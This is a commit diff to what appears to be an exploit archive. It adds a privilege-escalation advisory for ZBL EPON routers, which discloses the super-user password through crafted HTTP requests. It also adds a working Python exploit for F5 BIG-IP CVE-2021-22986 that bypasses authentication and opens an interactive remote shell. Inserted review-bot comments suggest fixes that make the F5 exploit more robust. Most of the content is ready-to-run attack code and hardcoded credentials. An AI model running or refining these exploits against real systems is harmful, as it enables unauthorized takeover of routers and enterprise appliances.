DB: 2021-04-03
2 changes to exploits/shellcodes:
- ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
- F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)
This commit is contained in:
parent
356d0ac56b
commit
cbe5b3f2e5
3 changed files with 176 additions and 0 deletions
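--- /dev/null
+++ b/exploits/hardware/webapps/49737.txt
@@ -0,0 +1,82 @@
+# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation
+# Date: 31.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com
+
+Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND))
+Product web page: http://www.zblchina.com | http://www.wd-thailand.com
+Affected version: Firmwre: V100R001
+Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE
+EONU Hardware Version V3.0
+Software: V2.46.02P6T5S
+Main Chip: RTL9607
+Master Controller, Copyright (c) R&D
+
+Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband
+router.
+
+Desc: The application suffers from a privilege escalation
+vulnerability. The limited administrative user (admin:admin)
+can elevate his/her privileges by sending a HTTP GET request
+to the configuration backup endpoint or the password page
+and disclose the http super user password. Once authenticated
+as super, an attacker will be granted access to additional and
+privileged functionalities.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+
+
+Advisory ID: ZSL-2021-5467
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php
+
+
+31.01.2021
+
+--
+
+
+Get config file and disclose super pwd:
+---------------------------------------
+
+POST /HG104B-ZG-E.config HTTP/1.1
+Host: 192.168.1.1
+Connection: keep-alive
+Content-Length: 42
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: https://192.168.1.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://192.168.1.1/system_configure.asp
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
+
+CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=
+
+
+...
+#web_1
+user_web_name=super
+user_web_password=www168nettv
+...
+
+
+Disclose super pwd from system pwd page:
+----------------------------------------
+
+GET /system_password.asp
+Host: 192.168.1.1
+
+...
+var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2');
+var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin');
+...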
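Review bot: The advisory ID in the header (`ZSL-2021-5467`) and the one embedded in the advisory URL (`ZSL-2021-5647`) disagree, so one of them is a digit transposition and a reader following the link may land on the wrong advisory; make the two consistent. The description says the limited admin user elevates "by sending a HTTP GET request to the configuration backup endpoint", but the proof-of-concept that follows is a `POST /HG104B-ZG-E.config HTTP/1.1` with the form body `CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files=`, so the prose should say POST (or state that GET was verified to work as well). "Firmwre" in the Affected version line is a typo for "Firmware". Neither request in the PoC carries a Cookie or Authorization header even though the text says the attack is performed as the `admin:admin` user; a one-line note such as `(both requests are sent from an authenticated admin:admin browser session)` would make the precondition explicit for anyone reproducing it.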
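--- /dev/null
+++ b/exploits/hardware/webapps/49738.py
@@ -0,0 +1,92 @@
+# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)
+# Exploit Author: Al1ex
+# Vendor Homepage: https://www.f5.com/products/big-ip-services
+# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2
+# CVE : CVE-2021-22986
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+import sys
+
+
+def title():
+    print('''
+______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __
+/ |\ \ / / | ____| |__ \ / _ \ |__ \ /_ | |__ \ |__ \ / _ \ / _ \ / /
+| ,----' \ \/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_
+| | \ / | __| |______/ / | | | | / / | | |______/ / / / \__, | > _ < | '_ \
+| `----. \ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) |
+\______| \__/ |_______| |____| \___/ |____| |_| |____| |____| /_/ \___/ \___/
+
+Author:Al1ex@Heptagram
+Github:https://github.com/Al1ex
+''')
+
+def exploit(url):
+    target_url = url + '/mgmt/shared/authn/login'
+    data = {
+        "bigipAuthCookie":"",
+        "username":"admin",
+        "loginReference":{"link":"/shared/gossip"},
+        "userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"}
+    }
+    headers = {
+        "User-Agent": "hello-world",
+        "Content-Type":"application/x-www-form-urlencoded"
+    }
+    response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)
+    if "/mgmt/shared/authz/tokens/" not in response.text:
+        print('(-) Get token fail !!!')
+        print('(*) Tested Method 2:')
+        header_2 = {
+            'User-Agent': 'hello-world',
+            'Content-Type': 'application/json',
+            'X-F5-Auth-Token': '',
+            'Authorization': 'Basic YWRtaW46QVNhc1M='
+        }
+        data_2 = {
+            "command": "run",
+            "utilCmdArgs": "-c whoami"
+        }
+        check_url = url + '/mgmt/tm/util/bash'
+        try:
+            response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)
+            if response2.status_code == 200 and 'commandResult' in response2.text:
+                while True:
+                    cmd = input("(:CMD)> ")
+                    data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)}
+                    r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)
+                    if r.status_code == 200 and 'commandResult' in r.text:
+                        print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
+            else:
+                print('(-) Not vuln...')
+                exit(0)
+        except Exception:
+            print('ERROR Connect')
+    print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]))
+    while True:
+        cmd = input("(:CMD)> ")
+        headers = {
+            "Content-Type": "application/json",
+            "X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])
+        }
+        data_json = {
+            "command": "run",
+            "utilCmdArgs": "-c \'%s\'"%(cmd)
+        }
+        exp_url= url + '/mgmt/tm/util/bash'
+        exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)
+        if exp_req.status_code == 200 and 'commandResult' in exp_req.text:
+            print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))
+        else:
+            print('(-) Not vuln...')
+            exit(0)
+
+if __name__ == '__main__':
+    title()
+    if(len(sys.argv) < 2):
+        print('[+] USAGE: python3 %s https://<target_url>\n'%(sys.argv[0]))
+        exit(0)
+    else:
+        exploit(sys.argv[1])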
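Review bot: When the fallback path's `except Exception:` handler prints `ERROR Connect`, control falls through to `print('(+) Extract token: %s' ...)`, whose `.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1]` cannot succeed because the enclosing `if "/mgmt/shared/authz/tokens/" not in response.text:` already established that substring is absent, so a connection error in method 2 ends in an IndexError traceback instead of a clean failure; add `sys.exit(1)` after `print('ERROR Connect')`. The first `requests.post(target_url, ...)` has no handler at all, so a refused connection or timeout also surfaces as a raw traceback, and both `exit(0)` calls on the `(-) Not vuln...` paths report success to a calling shell, where `sys.exit(1)` would let the script be driven from automation. The `'Authorization': 'Basic YWRtaW46QVNhc1M='` header is a fixed `admin:ASasS` credential with nothing explaining why that password value is acceptable; if, as the empty `X-F5-Auth-Token` header suggests, the password is not what makes the request succeed, a comment such as `# password is arbitrary; the empty X-F5-Auth-Token header is what the bypass relies on — confirm against the advisory` would save the next reader from guessing. Commands are interpolated into `-c '%s'` unescaped, so any command containing a single quote breaks the bash invocation; worth a one-line note or a `shlex.quote(cmd)`.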
|
@ -43914,3 +43914,5 @@ id,file,description,date,author,type,platform,port
|
||||||
49734,exploits/windows/webapps/49734.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)",2021-04-01,"Fellipe Oliveira",webapps,windows,
|
49734,exploits/windows/webapps/49734.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (1)",2021-04-01,"Fellipe Oliveira",webapps,windows,
|
||||||
49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,
|
49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,
|
||||||
49735,exploits/linux/webapps/49735.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)",2021-04-01,"Fellipe Oliveira",webapps,linux,
|
49735,exploits/linux/webapps/49735.py,"ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)",2021-04-01,"Fellipe Oliveira",webapps,linux,
|
||||||
|
49737,exploits/hardware/webapps/49737.txt,"ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation",2021-04-02,LiquidWorm,webapps,hardware,
|
||||||
|
49738,exploits/hardware/webapps/49738.py,"F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)",2021-04-02,Al1ex,webapps,hardware,
|
||||||
|
|